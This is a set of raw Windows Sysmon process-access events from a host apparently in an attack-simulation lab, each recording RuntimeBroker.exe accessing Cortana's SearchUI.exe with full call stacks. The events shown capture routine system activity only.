13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405936C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405544C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405544C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}4540808C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45406164C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45406164C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405980C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}4540808C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405380C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405980C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405380C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405660C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405660C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405300C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45406156C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
